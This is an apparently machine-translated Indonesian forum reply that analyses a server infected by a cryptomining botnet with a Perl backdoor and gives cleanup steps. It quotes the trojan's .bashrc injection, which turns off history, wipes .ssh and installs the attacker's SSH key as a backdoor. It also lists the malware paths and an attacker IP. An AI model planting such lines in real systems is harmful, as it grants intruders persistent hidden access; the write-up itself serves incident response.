Hal yang sama terjadi pada saya, dan saya perhatikan kemarin. Saya memeriksa file /var/log/syslog
dan IP ini (185.234.218.40) tampaknya secara otomatis menjalankan cronjobs.
Saya memeriksanya di http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) dan memiliki beberapa laporan. File-file ini diedit oleh trojan:
- .bashrc
- .ssh / berwenang_kunci
Saya menemukan ini di akhir .bashrc
(yang dijalankan setiap kali bash dibuka):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Ini menghapus authorized_keys
file Anda , yang merupakan daftar kunci SSH yang diizinkan untuk terhubung tanpa kata sandi. Kemudian, itu menambahkan kunci SSH penyerang:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
Selanjutnya, saya menemukan folder ini:, di /tmp/.X13-unix/.rsync
mana semua malware. Saya bahkan menemukan file,, /tmp/.X13-unix/.rsync/c/ip
file yang berisi 70.000 alamat IP, yang kemungkinan besar adalah korban atau server simpul lainnya.
Ada 2 solusi: A:
Tambahkan firewall yang memblokir semua koneksi keluar kecuali port 22 dan lainnya yang Anda anggap perlu dan aktifkan fail2ban, sebuah program yang melarang alamat IP setelah X upaya password gagal
Bunuh semua pekerjaan cron:,
ps aux | grep cron
lalu bunuh PID yang muncul
Ubah kata sandi Anda menjadi kata sandi yang aman
B:
Cadangkan semua file atau folder yang Anda butuhkan atau inginkan
Setel ulang server dan instal ulang Ubuntu, atau langsung buat tetesan baru
Seperti yang dikatakan Thom Wiggers, Anda tentu saja bagian dari botnet penambangan bitcoin, dan server Anda memiliki pintu belakang . Backdoor menggunakan eksploitasi perl, sebuah file yang terletak di sini /tmp/.X13-unix/.rsync/b/run
:, mengandung ini ( https://pastebin.com/ceP2jsUy )
Folder yang paling mencurigakan yang saya temukan adalah:
Akhirnya, ada sebuah artikel yang berhubungan dengan Perl Backdoor di sini:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
Saya harap Anda menemukan ini berguna.
.firefoxcatche
mungkin tidak ada hubungannya dengan firefox - mungkinkah ini penambang bitcoin? Coba unggah file yang dapat dieksekusi ke virustotal.